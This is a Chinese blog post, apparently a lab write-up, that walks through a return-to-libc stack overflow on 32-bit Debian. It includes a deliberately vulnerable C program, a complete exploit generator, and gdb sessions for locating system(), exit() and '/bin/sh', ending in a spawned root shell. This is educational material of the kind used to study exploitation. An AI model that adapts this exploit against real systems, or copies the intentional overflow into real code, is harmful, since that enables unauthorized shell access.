返回libc攻击

最新推荐文章于 2023-12-04 00:44:57 发布
最新推荐文章于 2023-12-04 00:44:57 发布
阅读量490 收藏 1
点赞数 1
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yrx0619/article/details/87387576
版权

0x01 环境

OS:Debian GNU/Linux 3.1
gcc:gcc version 3.3.5 (Debian 1:3.3.5-13)
gdb:GNU gdb (GDB) 7.4

使用这个方法,在ubuntu12.04上同样测试成功了。

0x02 源码

myretlib.c:存在栈溢出漏洞的程序

  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  int bof(FILE *badfile){
      char buffer[12];
      fread(buffer,sizeof(char),40,badfile);
      return 1;
  }

  int main(int argc, char **argv){
      FILE *badfile;
      badfile=fopen("badfile","r");
      bof(badfile);
      printf("returned properly\n");
      fclose(badfile);
      return 1;
  }

exploit.c:漏洞利用程序

  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  int main(int argc, char **argv){
      char buf[40];
      FILE *badfile;
      badfile=fopen("badfile","w");
      strcpy(buf, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");

      *(long *) &buf[36] = 0xbfffff7e;//0x4013b53b; /*用以保存//bin//sh 的相关地址*/
      *(long *) &buf[32] = 0x40046a80; /*用以保存//bin//sh 的相关地址*/
      *(long *) &buf[28] = 0x4005b790; /*用以保存system函数的相关地址*/
      *(long *) &buf[40] = 0x40046a80; /*用以保存exit函数的相关地址*/

      fwrite(buf, sizeof(buf), 1, badfile);
      fclose(badfile);
  }

test.c:获取/bin/sh地址的程序

#include <stdio.h>
#include <stdlib.h>

void main()
{
    return;
}

0x03 返回libc利用的步骤

  1. 找到/bin/sh的

    两种方法:

    一种方法是设置环境变量:通过环境变量设置/bin/sh

    export BIN_SH=/bin/sh

    get_env.c

    #include <stdio.h>
#include <stdlib.h>

void main()
{
    char * shell = getenv("BIN_SH");
    if(shell)
        printf("%x\n", (unsigned int)shell);
    return;
}

debian:/home/yerx/ret-to-lib# ./get_env
bfffff80

    注意:这个并不是漏洞利用程序中/bin/sh的地址,这个后面会说。现在只需要记下这个地址。

  2. 找到libc中system()函数,exit()函数的起始地址

    debian:/home/yerx/ret-to-lib# gdb -q ./test
Reading symbols from /home/yerx/ret-to-lib/test...done.
(gdb) disassemble
No frame selected.
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048354 <+0>:     push   %ebp
   0x08048355 <+1>:     mov    %esp,%ebp
   0x08048357 <+3>:     sub    $0x8,%esp
   0x0804835a <+6>:     and    $0xfffffff0,%esp
   0x0804835d <+9>:     mov    $0x0,%eax
   0x08048362 <+14>:    sub    %eax,%esp
   0x08048364 <+16>:    leave
   0x08048365 <+17>:    ret
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x8048364: file test.c, line 7.
(gdb) p system
No symbol "system" in current context.
(gdb) r
Starting program: /home/yerx/ret-to-lib/test

Breakpoint 1, main () at test.c:7
7       }
(gdb) p system
$1 = {<text variable, no debug info>} 0x4005b790 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x40046a80 <exit>
(gdb)

  3. 修改exploit.c程序中的地址

          *(long *) &buf[36] = 0xbfffff7e;//0x4013b53b; /*用以保存//bin//sh 的相关地址*/
      *(long *) &buf[32] = 0x40046a80; //exit地址
      *(long *) &buf[28] = 0x4005b790; /*用以保存system函数的相关地址*/
      *(long *) &buf[40] = 0x40046a80; /*用以保存exit函数的相关地址*/

    这里需要就这几个地址做一下说明buf[28],这个是myretlib.c程序,调用call bof指令之后,保存返回指令的地址。

    结合gdb调试信息看一下:

    debian:/home/yerx/ret-to-lib# gdb -q ./myretlib
Reading symbols from /home/yerx/ret-to-lib/myretlib...done.
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048473 <+0>:     push   %ebp
   0x08048474 <+1>:     mov    %esp,%ebp
   0x08048476 <+3>:     sub    $0x18,%esp
   0x08048479 <+6>:     and    $0xfffffff0,%esp
   0x0804847c <+9>:     mov    $0x0,%eax
   0x08048481 <+14>:    sub    %eax,%esp
   0x08048483 <+16>:    movl   $0x80485e4,0x4(%esp)
   0x0804848b <+24>:    movl   $0x80485e6,(%esp)
   0x08048492 <+31>:    call   0x8048368 <fopen@plt>
   0x08048497 <+36>:    mov    %eax,-0x4(%ebp)
   0x0804849a <+39>:    mov    -0x4(%ebp),%eax
   0x0804849d <+42>:    mov    %eax,(%esp)
   0x080484a0 <+45>:    call   0x8048444 <bof>
   0x080484a5 <+50>:    movl   $0x80485ee,(%esp)
   0x080484ac <+57>:    call   0x8048348 <printf@plt>
   0x080484b1 <+62>:    mov    -0x4(%ebp),%eax
   0x080484b4 <+65>:    mov    %eax,(%esp)
   0x080484b7 <+68>:    call   0x8048358 <fclose@plt>
   0x080484bc <+73>:    mov    $0x1,%eax
   0x080484c1 <+78>:    leave
   0x080484c2 <+79>:    ret
End of assembler dump.
(gdb) b *0x080484a0
Breakpoint 1 at 0x80484a0
(gdb) r
Starting program: /home/yerx/ret-to-lib/myretlib

Breakpoint 1, 0x080484a0 in main ()
(gdb) i r esp
esp            0xbffffd20       0xbffffd20
(gdb) i r ebp
ebp            0xbffffd38       0xbffffd38
(gdb) disassemble bof
Dump of assembler code for function bof:
   0x08048444 <+0>:     push   %ebp
   0x08048445 <+1>:     mov    %esp,%ebp
   0x08048447 <+3>:     sub    $0x28,%esp
   0x0804844a <+6>:     mov    0x8(%ebp),%eax
   0x0804844d <+9>:     mov    %eax,0xc(%esp)
   0x08048451 <+13>:    movl   $0x28,0x8(%esp)
   0x08048459 <+21>:    movl   $0x1,0x4(%esp)
   0x08048461 <+29>:    lea    -0x18(%ebp),%eax
   0x08048464 <+32>:    mov    %eax,(%esp)
   0x08048467 <+35>:    call   0x8048328 <fread@plt>
   0x0804846c <+40>:    mov    $0x1,%eax
   0x08048471 <+45>:    leave
   0x08048472 <+46>:    ret
End of assembler dump.

    在disass bof中,esp,esp+0x4,esp+0x8,esp+0xc已经用于保存参数,总共分配了0x28个字节的空间(40),使用了0xc个字节(12),还剩28个字节是局部变量buffer的。所以当28个字节之后就是call 0x8048444 <bof>,后面一条指令的地址0x080484a5.

       0x0804844d <+9>:     mov    %eax,0xc(%esp)
   0x08048451 <+13>:    movl   $0x28,0x8(%esp)
   0x08048459 <+21>:    movl   $0x1,0x4(%esp)
   0x08048461 <+29>:    lea    -0x18(%ebp),%eax
   0x08048464 <+32>:    mov    %eax,(%esp)

    查看一下esp+40的地址是否如描述的一致。

    (gdb) x/20x 0xbffffd1c
0xbffffd1c:     **0x080484a5**      0x08049768      0x080485e4      0xbffffd94
0xbffffd2c:     0x4014a8c0      0x40016540      0x08049768      0xbffffd68
0xbffffd3c:     0x40030e36      0x00000001      0xbffffd94      0xbffffd9c
0xbffffd4c:     0x08048380      0x00000000      0x4000bcd0      0x4014bdb4
0xbffffd5c:     0x40016ca0      0x00000001      0x08048380      0x00000000
(gdb)

    如上现实,确实是一直的。

    所以我们在buf[28]处填充system起始指令地址,然后我们知道函数栈帧的布局是如下所示
    在这里插入图片描述

    如果要取得函数参数,就是要上移8个字节,所以buf[36]应该就是/bin/sh的地址。返回地址应该就是我们exit函数的地址,所以这里就应该保存在buf[32]。(最后一个buf[40],是看网上很多例子这样写,其实是有问题的,在这里可以去掉。)

    这里还要注意的是

    *(long *) &buf[36] = 0xbfffff7e;//0x4013b53b; /*用以保存//bin//sh 的相关地址*/

    这里的/bin/sh地址并不是我们前面获取的0xbfffff80,这是因为,如果使用这个地址,将会出现

    debian:/home/yerx/ret-to-lib# ./myretlib
sh: line 1: in/sh: 没有那个文件或目录
段错误

    通过提示可以看到/bin/sh,少了/b这两个字节,所以这里我们迁移两个字节就是0xbfffff7e,这样就是正确的/bin/sh字符串了。

    设置好了/bin/sh, system, exit的地址之后,就可以利用这个漏洞了

  4. 执行

    debian:/home/yerx/ret-to-lib# gcc exploit.c -o exploit
debian:/home/yerx/ret-to-lib# ./exploit
debian:/home/yerx/ret-to-lib# gcc myretlib.c -o myretlib
debian:/home/yerx/ret-to-lib# ./myretlib
sh-2.05b# exit
exit

    成功调用/bin/sh,并正常退出了,若果使用网上设置buf[40]的方法,则无法正常退出,会出现段错误提示。

  5. 第二种找/bin/sh的方法,使用test程序找/bin/sh

    debian:/home/yerx/ret-to-lib# gdb -q ./test
Reading symbols from /home/yerx/ret-to-lib/test...done.
(gdb) b main
Breakpoint 1 at 0x8048364: file test.c, line 7.
(gdb) r
Starting program: /home/yerx/ret-to-lib/test

Breakpoint 1, main () at test.c:7
7       }
(gdb) p __libc_start_main
$1 = {<text variable, no debug info>} 0x40030d70 <__libc_start_main>
(gdb) find 0x40030d70,+1000000,"/bin/sh"
Pattern not found.
(gdb) find 0x40030d70,+2000000,"/bin/sh"
0x4013b53b
warning: Unable to access target memory at 0x4014af43, halting search.
1 pattern found.
(gdb)

    可以看到find 0x40030d70,+2000000,"/bin/sh"这个范围找到了/bin/sh,地址是0x4013b53b,这个地址可以直接赋值给buf[36]。

    执行的结果是一致的。

0x04 参考

https://zhuanlan.zhihu.com/p/32563626

yrx0619
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
计算机系统篇之链接(6):动态链接
woquhan的博客
04-30 536
本文描述了引入动态链接库的动机,并提供了 Linux 系统中生成和使用动态链接库的示例。
什么是gadget,以及64位libc如何泄露的问题
qq_43557177的博客
04-06 2712
最近开始学PWN,本以为栈溢出也就那些东西,看来是我少虑了… 在这里对这几天所学习的64位栈溢出泄露Libc的相关知识做一个小总结,当然,如果可以帮助到在读文章的你就更好啦。如果文中有错误,也希望各位大佬予以斧正。 什么是LIbc? 这个就是libc 这是一个动态链接文件 那么什么是动态链接和静态链接? 可以理解为: 静态链接:在程序编译的过程中,就预先把代码加载进程序中 //比如大家都经常写的...
【pwn】orw&rop --泄露libc基址,orw
question55的博客
12-04 142
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
fastbin关于chunk size检查问题&&花式泄露libc&&极限getshell&&huxiangbei_2019_namesyste
azraelxuemo的博客
04-10 2740
上图就是大家很熟悉的关于fastbin大小的一个检查 首先是里面一层 chunksize 以及外面一层 这是c源码 而对于汇编层面,由于运行的时候知道具体是32位还是64位,所以做了一定的优化 r15就是我们对应的chunk头地址,+8就是size的起始地址 但注意看,我们其实只是取了size的低8位 那么这里就是绕过的关键,网上很多地方其实讲的都不是很多 只要我们找到的size的地方低8位满足如下要求即可 000000yx y满足在2~8之间就好,x随意 同时size高八位也随意 因为可以看到我.
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 608
pwn 64位 泄露libc版本
返回libc攻击实验报告.docx
10-15
返回lib攻击实验,含详细步骤。 缓冲区溢出的常用攻击方法是用 shellcode 的地址来覆盖漏洞程序的返回地址,使得漏洞程序去执行存放在栈中 shellcode。为了阻止这种类型的攻击,一些操作系统使得系统管理员具有使栈...
使用网络入侵检测系统防止地址空间布局随机化(ASLR)受到损害和返回libc攻击
02-24
为此,我们概述了如何对派生前的并发服务器进行基于网络的蛮力返回libc攻击,以便获得对Shell的远程访问。 我们将继续证明主流保护方法在预防攻击方面如何有效,然后再证明并证明部署NIDS来减轻攻击所带来的任何...
musl libc 源码实现
最新发布
02-22
musl libc一个轻量级的 C 标准库实现,与其他 C 标准库有着一些显著的区别和特点。 它非常适合用于嵌入式系统的开发。嵌入式系统通常对资源消耗有较高要求,而 musl libc 的小体积和高效性使得它成为开发嵌入式...
Open BSD libc 源码
02-22
OpenBSD libc 是 OpenBSD 操作系统自带的 C 标准库实现,它与其他 C 标准库有着一些显著的区别和特点,下面是一些主要的特点: 安全性优先:OpenBSD libc 重视系统安全和可靠性,将其作为设计的首要目标。libc 的...
libc-2.24源代码
02-06
libc-2.24源代码
return2libc学习笔记
omnispace的博客
03-29 4656
0x00 背景介绍 author:万抽抽 r2libc技术是一种缓冲区溢出利用技术,主要用于克服常规缓冲区溢出漏洞利用技术中面临的no stack executable限制(所以后续实验还是需要关闭系统的ASLR,以及堆栈保护),比如PaX和ExecShield安全策略。该技术主要是通过覆盖栈帧中保存的函数返回地址(eip),让其定位到libc库中的某个库函数(如,system等),而不是
PWN利用动态链接跳转到任意函数执行地址
z2876563的博客
08-11 1130
前置知识-共享库与动态链接 以下部分为CSAPP第七章中的内容。 由于库函数是经常更新的,且像print这种函数会被调用很多次,如果使用静态库会被复制很多次,浪费空间。所以出现了共享库,所有程序在运行或加载时通过动态链接器动态链接共享同一段内存里的代码。在 Linux 系统中通常用 .so 后缀来表示可共享库,微软中用DLL表示。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yc4mpKz5-1628688973025)(https://gblobscdn.gitbook.c
Linux - 应用调用libc.so库的exit函数后CPU占100%,一直没有完成退出操作
IT架构师
06-06 542
Linux - 应用调用libc.so库的exit函数后CPU占100%,一直没有完成退出操作 问题现象 使用top命令查看,问题进程占满100% CPU; 使用perf top -p <PID>查看到99.72%的CPU比例消耗在C++标准库中的Rb_tree_increment。 [[email protected]] ~ # perf top -p <PID> Sample: 272k of event 'cycle', Event count (approx.): 5847980
二进制安全之——栈相关漏洞
PICACHU+++的博客
09-22 1316
栈主要是用于存储程序运行过程中的局部信息,大小不一,动态增长。栈的内存一般根据函数栈来进行划分(不用函数的程序很少见),不同的函数栈之间是互相隔离的,从而能实现函数的有效切换。函数栈上存储的信息一般包括:临时变量(包括栈保护哨carry)、函数栈的返回栈基址(bp)、函数的返回地址(ip)。
内存安全试验:ret2libc绕过DEP另一个例子
weixin_42072280的博客
05-09 681
关于ret2libc的实验原理见我的另一篇博客:https://mp.csdn.net/postedit/89948519 这是ret2libc的又一个例子 这个例子和之前的那个例子区别主要是:之前的那个例子漏洞程序和攻击程序是分开的,而这个实验是在一个程序里面实现的。 虽然看似比之前的那个简单,但是还是遇到了很多问题,现一一记录下来,供自己查阅,也供他人学习。 ...
泄露libc
inquisiter
01-12 1483
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如&amp;quot;%n&amp;quot;和&amp;quot;%12$p&amp;quot;这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露出libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
如何通过gdb查看反汇编代码
热门推荐
counsellor的专栏
06-13 2万+
0x00 程序源码 C代码如下: #include &amp;lt;stdio.h&amp;gt; int addme(int a, int b) { int c ; c = a+ b; return c; } int main(int argc, char const *argv[]) { int ret= 0; ret = addme(10,20); pri...
linux gdb调试汇编,汇编 – 使用gdb调试反汇编库
weixin_32584595的博客
05-16 519
在Linux和Mac OS X中,我可以使用stepi和nexti调试应用程序,而无需调试信息.在Mac OS X上,gdb显示了在库中调用的函数,尽管有时在每个stepi指令中提前执行几个汇编器指令.在Linux上,当我进入一个动态库gdb失去了.例如,puts()在puts()中有三个汇编指令,一旦gdb到达0x080482bf的跳转,就会失败,并显示“No function contains...
不可执行内存页保护攻击--return to libc attack
北方南方
10-24 1278
@1. 基本思路     控制eip使程序流程流向glibc函数,而不是shellcode所在的堆栈上。system(),exit()…… @2. 规划如下:                 缓冲区  --> 溢出                 ebp     --> 溢出                 eip     --> system()地址
Ret2libc攻击的防御策略有哪些
06-11
Ret2libc攻击是一种利用栈溢出漏洞来获取系统控制权的攻击方法,其中libc库函数被用于构造恶意代码。为了防止这种攻击,可以采取以下措施: 1. 栈溢出漏洞修复:修复栈溢出漏洞是防止Ret2libc攻击的最根本方法,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值